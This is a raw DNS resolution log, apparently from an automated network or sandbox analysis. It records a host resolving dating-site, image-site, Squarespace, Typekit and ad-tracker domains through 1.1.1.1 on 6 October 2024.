                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.403301001 CEST1.1.1.1192.168.2.60xef5fNo error (0)ruletridominium.web.app199.36.158.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.407071114 CEST1.1.1.1192.168.2.60x4bfeNo error (0)starpng.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.461889982 CEST1.1.1.1192.168.2.60xa25fNo error (0)www.pinclipart.com173.208.137.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.564918041 CEST1.1.1.1192.168.2.60x67e8No error (0)starpng.com172.67.128.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.564918041 CEST1.1.1.1192.168.2.60x67e8No error (0)starpng.com104.21.1.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:01.243252039 CEST1.1.1.1192.168.2.60x33dbNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:01.243252039 CEST1.1.1.1192.168.2.60x33dbNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:03.036784887 CEST1.1.1.1192.168.2.60x80e8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:03.036784887 CEST1.1.1.1192.168.2.60x80e8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.059366941 CEST1.1.1.1192.168.2.60x6b39No error (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.079266071 CEST1.1.1.1192.168.2.60xaa2cNo error (0)www.spark.net104.18.41.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.079266071 CEST1.1.1.1192.168.2.60xaa2cNo error (0)www.spark.net172.64.146.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.080496073 CEST1.1.1.1192.168.2.60x5c17No error (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.082401991 CEST1.1.1.1192.168.2.60x55a9No error (0)www.spark.net172.64.146.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.082401991 CEST1.1.1.1192.168.2.60x55a9No error (0)www.spark.net104.18.41.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.817080975 CEST1.1.1.1192.168.2.60xc241No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.818692923 CEST1.1.1.1192.168.2.60x6b04No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.820590019 CEST1.1.1.1192.168.2.60x2bbaNo error (0)assets.squarespace.comstatic.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.820590019 CEST1.1.1.1192.168.2.60x2bbaNo error (0)static.squarespace.map.fastly.net151.101.0.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.820590019 CEST1.1.1.1192.168.2.60x2bbaNo error (0)static.squarespace.map.fastly.net151.101.192.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.820590019 CEST1.1.1.1192.168.2.60x2bbaNo error (0)static.squarespace.map.fastly.net151.101.128.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.820590019 CEST1.1.1.1192.168.2.60x2bbaNo error (0)static.squarespace.map.fastly.net151.101.64.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.821858883 CEST1.1.1.1192.168.2.60x30ddNo error (0)assets.squarespace.comstatic.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.826703072 CEST1.1.1.1192.168.2.60x6db7No error (0)images.squarespace-cdn.comsquarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.841016054 CEST1.1.1.1192.168.2.60x7b6eNo error (0)images.squarespace-cdn.comsquarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.841016054 CEST1.1.1.1192.168.2.60x7b6eNo error (0)squarespace.map.fastly.net151.101.0.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.841016054 CEST1.1.1.1192.168.2.60x7b6eNo error (0)squarespace.map.fastly.net151.101.64.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.841016054 CEST1.1.1.1192.168.2.60x7b6eNo error (0)squarespace.map.fastly.net151.101.128.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.841016054 CEST1.1.1.1192.168.2.60x7b6eNo error (0)squarespace.map.fastly.net151.101.192.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.853513956 CEST1.1.1.1192.168.2.60xa1daNo error (0)static1.squarespace.comprod.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.853513956 CEST1.1.1.1192.168.2.60xa1daNo error (0)prod.squarespace.map.fastly.net151.101.128.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.853513956 CEST1.1.1.1192.168.2.60xa1daNo error (0)prod.squarespace.map.fastly.net151.101.192.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.853513956 CEST1.1.1.1192.168.2.60xa1daNo error (0)prod.squarespace.map.fastly.net151.101.64.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.853513956 CEST1.1.1.1192.168.2.60xa1daNo error (0)prod.squarespace.map.fastly.net151.101.0.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.854845047 CEST1.1.1.1192.168.2.60x653eNo error (0)static1.squarespace.comprod.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867037058 CEST1.1.1.1192.168.2.60xa5cfNo error (0)images.squarespace-cdn.comsquarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867073059 CEST1.1.1.1192.168.2.60x2693No error (0)images.squarespace-cdn.comsquarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867073059 CEST1.1.1.1192.168.2.60x2693No error (0)squarespace.map.fastly.net151.101.64.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867073059 CEST1.1.1.1192.168.2.60x2693No error (0)squarespace.map.fastly.net151.101.128.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867073059 CEST1.1.1.1192.168.2.60x2693No error (0)squarespace.map.fastly.net151.101.0.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.867073059 CEST1.1.1.1192.168.2.60x2693No error (0)squarespace.map.fastly.net151.101.192.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.935511112 CEST1.1.1.1192.168.2.60xa8adNo error (0)assets.squarespace.comstatic.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.935511112 CEST1.1.1.1192.168.2.60xa8adNo error (0)static.squarespace.map.fastly.net151.101.128.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.935511112 CEST1.1.1.1192.168.2.60xa8adNo error (0)static.squarespace.map.fastly.net151.101.64.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.935511112 CEST1.1.1.1192.168.2.60xa8adNo error (0)static.squarespace.map.fastly.net151.101.0.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.935511112 CEST1.1.1.1192.168.2.60xa8adNo error (0)static.squarespace.map.fastly.net151.101.192.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.937302113 CEST1.1.1.1192.168.2.60x9437No error (0)assets.squarespace.comstatic.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:39.018301964 CEST1.1.1.1192.168.2.60xc56No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:39.019040108 CEST1.1.1.1192.168.2.60x2167No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.815905094 CEST1.1.1.1192.168.2.60x1dd0No error (0)static1.squarespace.comprod.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.815905094 CEST1.1.1.1192.168.2.60x1dd0No error (0)prod.squarespace.map.fastly.net151.101.128.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.815905094 CEST1.1.1.1192.168.2.60x1dd0No error (0)prod.squarespace.map.fastly.net151.101.192.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.815905094 CEST1.1.1.1192.168.2.60x1dd0No error (0)prod.squarespace.map.fastly.net151.101.64.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.815905094 CEST1.1.1.1192.168.2.60x1dd0No error (0)prod.squarespace.map.fastly.net151.101.0.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.819227934 CEST1.1.1.1192.168.2.60xd6d6No error (0)static1.squarespace.comprod.squarespace.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.339775085 CEST1.1.1.1192.168.2.60x3479No error (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.344245911 CEST1.1.1.1192.168.2.60xdbf3No error (0)www.spark.net104.18.41.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.344245911 CEST1.1.1.1192.168.2.60xdbf3No error (0)www.spark.net172.64.146.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.804434061 CEST1.1.1.1192.168.2.60xd5d8No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.806119919 CEST1.1.1.1192.168.2.60x8707No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.453681946 CEST1.1.1.1192.168.2.60xeab3No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.455867052 CEST1.1.1.1192.168.2.60xdedaNo error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.564470053 CEST1.1.1.1192.168.2.60x7666No error (0)performance.squarespace.com35.186.236.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:56.994231939 CEST1.1.1.1192.168.2.60xc6e7No error (0)about.christianmingle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:56.994249105 CEST1.1.1.1192.168.2.60xd433No error (0)about.christianmingle.com172.64.152.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:56.994249105 CEST1.1.1.1192.168.2.60xd433No error (0)about.christianmingle.com104.18.35.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:57.774404049 CEST1.1.1.1192.168.2.60xd23bNo error (0)maps-api-ssl.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:57.777203083 CEST1.1.1.1192.168.2.60x5810No error (0)maps-api-ssl.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.301732063 CEST1.1.1.1192.168.2.60xe9f5No error (0)about.christianmingle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.304455996 CEST1.1.1.1192.168.2.60x53ebNo error (0)about.christianmingle.com172.64.152.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.304455996 CEST1.1.1.1192.168.2.60x53ebNo error (0)about.christianmingle.com104.18.35.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.501882076 CEST1.1.1.1192.168.2.60x923No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.501882076 CEST1.1.1.1192.168.2.60x923No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.501914978 CEST1.1.1.1192.168.2.60xd1c7No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.699310064 CEST1.1.1.1192.168.2.60x26No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.699310064 CEST1.1.1.1192.168.2.60x26No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.699753046 CEST1.1.1.1192.168.2.60xc5d3No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.766002893 CEST1.1.1.1192.168.2.60xfd12No error (0)maps-api-ssl.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.773492098 CEST1.1.1.1192.168.2.60x43c3No error (0)maps-api-ssl.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)s.pinimg.coms-pinimg-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)s-pinimg-com.gslb.pinterest.com2-01-37d2-0020.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)dualstack.pinterest.map.fastly.net151.101.128.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)dualstack.pinterest.map.fastly.net151.101.192.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)dualstack.pinterest.map.fastly.net151.101.0.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.399895906 CEST1.1.1.1192.168.2.60x1d73No error (0)dualstack.pinterest.map.fastly.net151.101.64.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.401925087 CEST1.1.1.1192.168.2.60x4a3bNo error (0)s.pinimg.coms-pinimg-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.401925087 CEST1.1.1.1192.168.2.60x4a3bNo error (0)s-pinimg-com.gslb.pinterest.com2-01-37d2-0020.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403556108 CEST1.1.1.1192.168.2.60xb7d3No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403803110 CEST1.1.1.1192.168.2.60x840No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403803110 CEST1.1.1.1192.168.2.60x840No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403803110 CEST1.1.1.1192.168.2.60x840No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403803110 CEST1.1.1.1192.168.2.60x840No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.403803110 CEST1.1.1.1192.168.2.60x840No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404071093 CEST1.1.1.1192.168.2.60xcf78No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404071093 CEST1.1.1.1192.168.2.60xcf78No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404071093 CEST1.1.1.1192.168.2.60xcf78No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404071093 CEST1.1.1.1192.168.2.60xcf78No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404071093 CEST1.1.1.1192.168.2.60xcf78No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.404172897 CEST1.1.1.1192.168.2.60x86d6No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.408992052 CEST1.1.1.1192.168.2.60x4d80No error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.408992052 CEST1.1.1.1192.168.2.60x4d80No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.408992052 CEST1.1.1.1192.168.2.60x4d80No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.740464926 CEST1.1.1.1192.168.2.60xd4a6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.740464926 CEST1.1.1.1192.168.2.60xd4a6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.980976105 CEST1.1.1.1192.168.2.60x20dcNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.980976105 CEST1.1.1.1192.168.2.60x20dcNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)s.pinimg.coms-pinimg-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)s-pinimg-com.gslb.pinterest.com2-01-37d2-0020.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)dualstack.pinterest.map.fastly.net151.101.192.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)dualstack.pinterest.map.fastly.net151.101.128.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)dualstack.pinterest.map.fastly.net151.101.0.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981488943 CEST1.1.1.1192.168.2.60x3f27No error (0)dualstack.pinterest.map.fastly.net151.101.64.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981642008 CEST1.1.1.1192.168.2.60x6655No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.981642008 CEST1.1.1.1192.168.2.60x6655No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.982413054 CEST1.1.1.1192.168.2.60x6aa6No error (0)s.pinimg.coms-pinimg-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.982413054 CEST1.1.1.1192.168.2.60x6aa6No error (0)s-pinimg-com.gslb.pinterest.com2-01-37d2-0020.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com54.165.51.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com52.200.121.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com44.206.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com3.220.154.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com3.208.227.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.035433054 CEST1.1.1.1192.168.2.60x2834No error (0)px.adentifi.com44.218.170.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.045025110 CEST1.1.1.1192.168.2.60x6fbdNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.045025110 CEST1.1.1.1192.168.2.60x6fbdNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.045025110 CEST1.1.1.1192.168.2.60x6fbdNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.045025110 CEST1.1.1.1192.168.2.60x6fbdNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.045025110 CEST1.1.1.1192.168.2.60x6fbdNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.048592091 CEST1.1.1.1192.168.2.60xa5e1No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.094497919 CEST1.1.1.1192.168.2.60xbfaeNo error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.094497919 CEST1.1.1.1192.168.2.60xbfaeNo error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.094497919 CEST1.1.1.1192.168.2.60xbfaeNo error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.094497919 CEST1.1.1.1192.168.2.60xbfaeNo error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.094497919 CEST1.1.1.1192.168.2.60xbfaeNo error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.095422029 CEST1.1.1.1192.168.2.60x3ef5No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236640930 CEST1.1.1.1192.168.2.60x7b60No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236640930 CEST1.1.1.1192.168.2.60x7b60No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236640930 CEST1.1.1.1192.168.2.60x7b60No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236640930 CEST1.1.1.1192.168.2.60x7b60No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236640930 CEST1.1.1.1192.168.2.60x7b60No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.236711025 CEST1.1.1.1192.168.2.60x4fd4No error (0)psb.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.237560034 CEST1.1.1.1192.168.2.60x5c89No error (0)psb.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.237560034 CEST1.1.1.1192.168.2.60x5c89No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.237560034 CEST1.1.1.1192.168.2.60x5c89No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.237560034 CEST1.1.1.1192.168.2.60x5c89No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.237560034 CEST1.1.1.1192.168.2.60x5c89No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.243320942 CEST1.1.1.1192.168.2.60xb60dNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
